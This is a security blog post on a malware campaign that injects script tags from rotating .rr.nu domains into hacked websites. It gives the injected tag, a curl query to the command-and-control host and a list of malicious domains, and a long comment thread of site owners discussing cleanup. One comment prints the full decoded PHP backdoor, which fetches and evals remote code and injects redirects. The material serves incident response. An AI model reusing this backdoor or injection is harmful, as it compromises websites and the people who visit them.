Malware Campaign from .rr.nu

No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.

This is what gets added to the footer of the hacked sites:

<script  src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>

Once loaded, it does another level of redirection to http://ixeld52erlya.rr.nu/n.php?h=1&s=pmg (random domain, but using the parameters h1&s=pmg), which will then attempt to exploit via browser using multiple exploit kits.


Those domains are changing daily, but always pointing to 194.28.114.103. What’s interesting is that the compromised sites also have a backdoor that calls http://www.lilypophilypop.com/g_load.php (their command and control) to get the new list of domains to display.

A quick query of this site shows the current live domains:

$ curl -sq http://www.lilypophilypop.com/g_load.php
http://uotes98satur.rr.nu/
http://ixeld52erlya.rr.nu/
http://ile68depa.rr.nu/
http://cie69svoi.rr.nu/
http://ues02the.rr.nu/
http://ordonv12ectorct.rr.nu/
http://ngv83ete.rr.nu/
http://waranc72hexcit.rr.nu/
http://ereaso88nsphas.rr.nu/
http://erbac03klogwi.rr.nu/
http://rtfall80shesdo.rr.nu/
http://mitexp80ressman.rr.nu/
http://tingst30iffles.rr.nu/
http://ford53blue.rr.nu/
http://trill18ionsa.rr.nu/

Here are domains we have found so far:

aising32austral.rr.nu
anc57erid.rr.nu
ancisc11oretai.rr.nu
arcot97icscch.rr.nu
asu31ryc.rr.nu
atio79srem.rr.nu
ban85kmak.rr.nu
bea90utym.rr.nu
cdeter66minatio.rr.nu
chelpo94landsa.rr.nu
chread73erspar.rr.nu
cie69svoi.rr.nu
dend21ange.rr.nu
deunce68rtaint.rr.nu
dsadva20ntages.rr.nu
eacti41vities.rr.nu
ectors56rushedb.rr.nu
edu11tch.rr.nu
enc89efo.rr.nu
ent70als.rr.nu
ents14publ.rr.nu
erbac03klogwi.rr.nu
ereaso88nsphas.rr.nu
ers49sup.rr.nu
esed94ownu.rr.nu
evaryc13ornerf.rr.nu
ffs06dive.rr.nu
ford53blue.rr.nu
ged20sha.rr.nu
gerd84eckpa.rr.nu
ghl07evel.rr.nu
ibl42efar.rr.nu
ile68depa.rr.nu
ime27glim.rr.nu
ingin64terac.rr.nu
insist18suspen.rr.nu
irdcap79turedre.rr.nu
irstde24clined.rr.nu
iss79ione.rr.nu
itioni67nggene.rr.nu
itsd81evic.rr.nu
ive49scor.rr.nu
ixeld52erlya.rr.nu
jitsu17quakec.rr.nu
king35dayv.rr.nu
lanne44rsacqu.rr.nu
lia82tio.rr.nu
llyim30munity.rr.nu
mitexp80ressman.rr.nu
mputer94izeduni.rr.nu
nadap83artic.rr.nu
ncello05rjuice.rr.nu
ncho61ragef.rr.nu
ngbe82ntse.rr.nu
ngv83ete.rr.nu
nhanc79emayb.rr.nu
nic99wel.rr.nu
nlygpa40rentsre.rr.nu
nom21iesa.rr.nu
nwin54simpl.rr.nu
odity02prince.rr.nu
omist96smoto.rr.nu
onmyse88lfadvis.rr.nu
onth92send.rr.nu
ordonv12ectorct.rr.nu
orkic86kedgra.rr.nu
oul44dbe.rr.nu
pital40relat.rr.nu
quic34kprog.rr.nu
rcles12mainde.rr.nu
renw05insim.rr.nu
rie21rcom.rr.nu
rin43gco.rr.nu
roduc37edter.rr.nu
rpo66rat.rr.nu
rtfall80shesdo.rr.nu
rwest23pasto.rr.nu
sba15gsed.rr.nu
ssurem70ountai.rr.nu
sup01port.rr.nu
syste98msman.rr.nu
tarian13cheese.rr.nu
tel90yget.rr.nu
terda31ytime.rr.nu
tfo04lio.rr.nu
tin04gobs.rr.nu
tingst30iffles.rr.nu
tomoti62veform.rr.nu
trill18ionsa.rr.nu
ttr92acte.rr.nu
ublic19ations.rr.nu
ues02the.rr.nu
untyh37umane.rr.nu
uotes98satur.rr.nu
vesc01hang.rr.nu
vesr27epla.rr.nu
waranc72hexcit.rr.nu

We will post more details as we monitor and can expand.

Let us know in the comments below if you have any questions.

62 comments
  1. Just found this while testing some css on a wordpress install that has been sitting around for a while. Any idea what the likely attack vector was? thought I was running at least a vaguely tight ship. 

    1.  I’m in the same boat, trying to remove some outdated files now and might try Walker’s script.

  2. My wordpress blog got compromised by this campaign, seemingly via an outdated version of the wp-spamfree plugin (which I can’t even remember installing but it’s possible I did). I manually removed the plugin and upgraded WP to the latest version and that seems to have done the trick.

  3. I’ve got this, as well as a nice chunk of base64-decode code at the beginning of all my php files. I’ve removed that all and upgraded WordPress. I am still getting the redirect script in my footer though. Strangely, it only works in IE. Chrome doesn’t load it.

    1. Couple links that might be of use:

      http://codex.wordpress.org/FAQ_My_site_was_hacked

      https://blog.sucuri.net/2010/02/removing-malware-from-a-wordpress-blog-case-study.html — see section 3, cleaning up WordPress.

      What I’ve done so far is basically what they recommend:
      – Back up database
      – Back up files
      – Change MySQL user password
      – Reinstall WordPress (I did this manually but you may be able to do this via the admin panel)
      – Fix/reinstall theme, plugins, etc

      Quite a pain…

      1. I have actually done this, and two days after my theme files were infected again (I changed the FTP password as well).

        Anyone knows how they are getting in? I don’t want to keep cleaning my site when I don’t know how to close the hole they get in through.

        Seems like we’re all on Dreamhost, so maybe it’s something on their network. This will make it really hard for us to fix ourselfs.

  4. finishing a php code to clean all infected php files, tested. will take more tests, and will share on github near..

        1. new release: v0.2 beta. Bow based on regex search engine, catch more variations. http://t.co/vYdLHJuQ

    1.  It came back.. and this time it’s not working for me at all.  Any suggestions?  I have many sites and 10s of thousands of files that are infected.

    2.  I installed rrnuVaccine.php on our web site and ran it.  All it did was take my browser to your web site.  Am I missing something?

      Thanks

      Regards,
      Doug

      1. I was also getting redirected to sucuri. it appeared that i had just rightclicked on rrnuVaccine.php and clicked on Save and uploaded to the site. In fact, we have to copy the actual code and save it in notepad to rrnuVaccine.php file then upload. Hope it helps other noobs like me.

  5. My Joomla websites were hacked. Walker’s script did not do the trick for cleaning up the files.  Any mod’s that would allow this script to work for me? 

      1. hi Alaina, i have detected anothers variety string, and iḿ adjust code to search more strings…

        You can update rrnuVaccine.php on line 125 with ur “infected string”, it appear on begin of files: at same line.

        share with me one infected file by pastebin and i will add string in next version ok?

        1.  I can’t believe I didn’t try this.  It worked for me on my 2nd hacked sites.  Is there a way to make it go down one directory?  for example right now i copy it to my /home/user/website directory but i have many sites so is there a way it can start scanning at /home/user/ ?  I am not too familiar with PHP.

          1. I found the backdoor r.php and rr.php buried deep within my wp-content/uploads directory, multiple instances too. Found it running the file, comes up clean but if you look at the code, you will recognize it. Script works great cleaning site.

    1. Did it give you any errors or did it just not run?  There is a specific string it is looking for that exists at the top of each of your infected pages, something like “eval(base64_decode…[bunch of characters]”  

      This string is specified near the bottom of Walker’s script.  I’m speculating, but it may be possible that you have a different variety of the malware with a different string signature.  See if you can find an example infected page and compare the strings.  This tool was helpful in identifying infected pages.  http://sitecheck.sucuri.net/scanner/

  6. Have you any text to include for the robots.txt on our websites? Is there any type of robotics they are using that we can phase out? I put a robots text on my desktop and it seems to function, even for others.

  7. I also got this, from a domain that is not on your list — ingg93rant dot rr dot nu.

  8. Is there any way of telling what their mode of operation is……how or where they found the vulnerabilty that allowed them to get in to your website and what options are available to secure your site better after an attack?

  9. One of my sites was affected.  I noticed some entries in my information_schema MySQL database.

    How do I remove them?  Is information_schema a standard part of all WordPress MySQL installs?  If so, is it modified by specific themes?

    SELECT *
    FROM `information_schema`.`PROCESSLIST`
    WHERE (
    `ID` LIKE ‘%<script%'
    OR `USER` LIKE '%<script%'
    OR `HOST` LIKE '%<script%'
    OR `DB` LIKE '%<script%'
    OR `COMMAND` LIKE '%<script%'
    OR `TIME` LIKE '%<script%'
    OR `STATE` LIKE '%<script%'
    OR `INFO` LIKE '%%’
    OR `USER` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `HOST` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `DB` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `COMMAND` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `TIME` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `STATE` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `INFO` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’)
    LIMIT 0 , 30

    EXPLAIN SELECT *
    FROM `information_schema`.`PROCESSLIST`
    WHERE (
    `ID` LIKE ‘%<script%'
    OR `USER` LIKE '%<script%'
    OR `HOST` LIKE '%<script%'
    OR `DB` LIKE '%<script%'
    OR `COMMAND` LIKE '%<script%'
    OR `TIME` LIKE '%<script%'
    OR `STATE` LIKE '%<script%'
    OR `INFO` LIKE '%%’
    OR `USER` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `HOST` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `DB` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `COMMAND` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `TIME` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `STATE` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `INFO` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’)

  10. Seems like everyone I’ve spoken to who has been affected by this is on DreamHost. Not sure yet whether it’s just a coincidence… 

    1. I’m also on DreamHost.  I contacted them about it and they sent me a list of all of the files that they showed as being infected.  Only the WordPress databases were affected for me.  I have a few other directories and those files were unaffected.

      1. All of my .PHP files were (are infected). It seems to come back every day now. I’m assuming my databases are infected too, how did you clean the DBs? The dream host guy gave me a SSH shell command to run which will apparently remove the bad code, I’ll see if that works but the cause will obviously still be there.

  11. Walker de Alencar, you are a badass!

    So I am a security idiot… for others like me that get screwed by this – here is the explanation /  answer I have figured so far.

    1. Your site gets a malware notice, especially in IE, I am on a mac and did not get it. 

    2. When you view source your page, just before the closing body tag you see a script directing to an rr.nu domain. Such as

    But when you look at the actual code on the server page (not your local files obviously) you do not see it, but wait… there is now a ton of junk code at the top in a PHP line.

    3. This code is a base64 string and will resemble:

    4. When this is decoded, it really reads as: 

    if(function_exists(‘ob_start’)&&!isset($_SERVER[‘mr_no’])){  $_SERVER[‘mr_no’]=1;    if(!function_exists(‘mrobh’)){    function get_tds_777($url){$content=””;$content=@trycurl_777($url);if($content!==false)return $content;$content=@tryfile_777($url);if($content!==false)return $content;$content=@tryfopen_777($url);if($content!==false)return $content;$content=@tryfsockopen_777($url);if($content!==false)return $content;$content=@trysocket_777($url);if($content!==false)return $content;return ”;}  function trycurl_777($url){if(function_exists(‘curl_init’)===false)return false;$ch = curl_init ();curl_setopt ($ch, CURLOPT_URL,$url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_TIMEOUT, 5);curl_setopt ($ch, CURLOPT_HEADER, 0);$result = curl_exec ($ch);curl_close($ch);if ($result==””)return false;return $result;}  function tryfile_777($url){if(function_exists(‘file’)===false)return false;$inc=@file($url);$buf=@implode(”,$inc);if ($buf==””)return false;return $buf;}  function tryfopen_777($url){if(function_exists(‘fopen’)===false)return false;$buf=”;$f=@fopen($url,’r’);if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf==””)return false;return $buf;}  function tryfsockopen_777($url){if(function_exists(‘fsockopen’)===false)return false;$p=@parse_url($url);$host=$p[‘host’];$uri=$p[‘path’].’?’.$p[‘query’];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request =”GET $uri HTTP/1.0n”;$request.=”Host: $hostnn”;fwrite($f,$request);$buf=”;while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf==””)return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function trysocket_777($url){if(function_exists(‘socket_create’)===false)return false;$p=@parse_url($url);$host=$p[‘host’];$uri=$p[‘path’].’?’.$p[‘query’];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request =”GET $uri HTTP/1.0n”;$request.=”Host: $hostnn”;socket_write($sock,$request);$buf=”;while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf==””)return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function update_tds_file_777($tdsfile){$actual1=$_SERVER[‘s_a1’];$actual2=$_SERVER[‘s_a2’];$val=get_tds_777($actual1);if ($val==””)$val=get_tds_777($actual2);$f=@fopen($tdsfile,”w”);if ($f){@fwrite($f,$val);@fclose($f);}if (strstr($val,”|||CODE|||”)){list($val,$code)=explode(“|||CODE|||”,$val);eval(base64_decode($code));}return $val;}  function get_actual_tds_777(){$defaultdomain=$_SERVER[‘s_d1’];$dir=$_SERVER[‘s_p1’];$tdsfile=$dir.”log1.txt”;if (@file_exists($tdsfile)){$mtime=@filemtime($tdsfile);$ctime=time()-$mtime;if ($ctime>$_SERVER[‘s_t1’]){$content=update_tds_file_777($tdsfile);}else{$content=@file_get_contents($tdsfile);}}else{$content=update_tds_file_777($tdsfile);}$tds=@explode(“n”,$content);$c=@count($tds)+0;$url=$defaultdomain;if ($c>1){$url=trim($tds[mt_rand(0,$c-2)]);}return $url;}  function is_mac_777($ua){$mac=0;if (stristr($ua,”mac”)||stristr($ua,”safari”))if ((!stristr($ua,”windows”))&&(!stristr($ua,”iphone”)))$mac=1;return $mac;}  function is_msie_777($ua){$msie=0;if (stristr($ua,”MSIE 6″)||stristr($ua,”MSIE 7″)||stristr($ua,”MSIE 8″)||stristr($ua,”MSIE 9″))$msie=1;return $msie;}    function setup_globals_777(){$rz=$_SERVER[“DOCUMENT_ROOT”].”/.logs/”;$mz=”/tmp/”;if (!is_dir($rz)){@mkdir($rz);if (is_dir($rz)){$mz=$rz;}else{$rz=$_SERVER[“SCRIPT_FILENAME”].”/.logs/”;if (!is_dir($rz)){@mkdir($rz);if (is_dir($rz)){$mz=$rz;}}else{$mz=$rz;}}}else{$mz=$rz;}$bot=0;$ua=$_SERVER[‘HTTP_USER_AGENT’];if (stristr($ua,”msnbot”)||stristr($ua,”Yahoo”))$bot=1;if (stristr($ua,”bingbot”)||stristr($ua,”google”))$bot=1;$msie=0;if (is_msie_777($ua))$msie=1;$mac=0;if (is_mac_777($ua))$mac=1;if (($msie==0)&&($mac==0))$bot=1;  global $_SERVER;    $_SERVER[‘s_p1’]=$mz;  $_SERVER[‘s_b1’]=$bot;  $_SERVER[‘s_t1’]=1200;  $_SERVER[‘s_d1′]=”http://sweepstakesandcontestsdo.com/”;  $d=’?d=’.urlencode($_SERVER[“HTTP_HOST”]).”&p=”.urlencode($_SERVER[“PHP_SELF”]).”&a=”.urlencode($_SERVER[“HTTP_USER_AGENT”]);  $_SERVER[‘s_a1′]=’http://www.mrsmtihinfo.ru/g_load.php’.$d;  $_SERVER[‘s_a2′]=’http://www.cooperjsutf8.ru/g_load.php’.$d;  $_SERVER[‘s_script’]=”nl.php?p=d”;  }      setup_globals_777();    if(!function_exists(‘gml_777’)){  function gml_777(){    $r_string_777=”;  if ($_SERVER[‘s_b1’]==0)$r_string_777=”;  return $r_string_777;  }  }      if(!function_exists(‘gzdecodeit’)){  function gzdecodeit($decode){  $t=@ord(@substr($decode,3,1));  $start=10;  $v=0;  if($t&4){  $str=@unpack(‘v’,substr($decode,10,2));  $str=$str[1];  $start+=2+$str;  }  if($t&8){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&16){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&2){  $start+=2;  }  $ret=@gzinflate(@substr($decode,$start));  if($ret===FALSE){  $ret=$decode;  }  return $ret;  }  }  function mrobh($content){  @Header(‘Content-Encoding: none’);  $decoded_content=gzdecodeit($content);  if(preg_match(‘/</body/si',$decoded_content)){  return preg_replace('/(]*>)/si’,gml_777().”n”.’$1′,$decoded_content);  }else{  return $decoded_content.gml_777();  }  }  ob_start(‘mrobh’);  }  }

    5. I have not done much investigating into these sites, but the script redirects to random urls all pointing to an IP address 194.28.114.103 in F’ing Maldova (I had to look it up, a country between Ukraine and Romania) So when this code that is inserted into all php and html pages is inserted and decoded, it appears http://sweepstakesandcontestsdo.com , http://www.mrsmtihinfo.ru , http://www.cooperjsutf8.ru are the culprits. I hope someone can do something about these jack asses. 

    6. I am running a current and totally updated version of WordPress when it was hacked.
    a) deactivate all plugins, and update them
    b) update wordpress network
    c) update theme if valid
    d) in general, strip everything down as much as possible and update what you can
    e) check your .htacess file, go get it from your remote server and remove the junk and check your permissions are 644, you can do this through Cpanel.
    f) change your ftp user password, AND be sure to change your connection method on whatever FTP client you use to “SFPT”
    g) check your wordpress admin users to make sure you are aware of all admin account, change passwords

    7) go to https://github.com/walkeralencar/rrnuVaccine and copy the php code from Walker’s script into a new PHP file, 

    NOTE: before uploading, and this is the key to make it work for you as the base64 junk in your page will be likely be slightly different from various mutations of this malware bull… “Get” a copy of an infected page and copy all the code from:

    and replace your garbage code over Walker’s script code (begin on line 125)

    8. Save and upload it on the root of your site (where the wp-config file is) and run it through the browser. I had over 2,000 files disinfected. Go to http://sitecheck.sucuri.net/scanner/ and scan your URL (if you have done this prior, you will see cached results, even if you hit the browser refresh button) be sure to hit the “rescan” button at the bottom of the site. I am all clear now!

    9. Not yet where the actual vulnerability is and I expect this to come back, but at least I can clean it now in moments, thanks to Walker, as I keep figuring it out. On to further investigate and search “Harden WordPress”… I’ll update with more as I learn. 

    1. ok so code snippets were stripped out in my reply, if you need them, just holler for details.

  12. I’m trying to use Walker’s script, but it returns this when I try to run it:

    Warning: Unexpected character in input: ” (ASCII=92) state=1 in /blog/rrnuVaccine.php on line 8

    Warning: Unexpected character in input: ” (ASCII=92) state=1 in /blog/rrnuVaccine.php on line 14

    Parse error: syntax error, unexpected T_CLASS in /blog/rrnuVaccine.php on line 15

    Any ideas on how to make it work?

  13. rrnu Vaccine v0.2 beta on github: http://t.co/vYdLHJuQ

    Regex based, now detect more variants.

  14. Hi, today I’ve found inside my wp site (hosted on site5, London server) a directory called “.logs” and there a txt files with a list of rr.nu subdomains. What does it mean?

      1. But if I run https://github.com/walkeralencar/rrnuVaccine and then I delete that directory, am I ok?
        I found the infection started from a wordpress plugin, eshop-languages. Sigh!

        1. Perhaps… The problem is that it can be hard to identify yourself if your not a tech wiz. Even though I have a long background with computers, I still ended up buying one of Sucuri’s packages (and everything was dandy fine an hour later)

          1.  now are easy, dont need identify infection string. v0.2 beta are Regex based.

            Only put on root dir, and run script 😉

  15. I don’t know what we would have done without Sucuri.  All sites are now stable, I have a few of our staging sites that continue to get infected.  After 2 long years of dealing with this, Sucuri.net has literally saved dozens of our clients’ sites.  YOU GUYS ARE THE BEST.

    Cherie Young

    1. I have just encountered a pretty stubborn bit of this hacking and was looking. around for things to help. Your article was very informative, thanks.

  16. How can I remove it. I looked into my footer.php and source code and I can’t find it. But, when I scanned my site using sucuri.net, you were able to detect it, but don’t show where it’s located exactly. 🙁

Comments are closed.

You May Also Like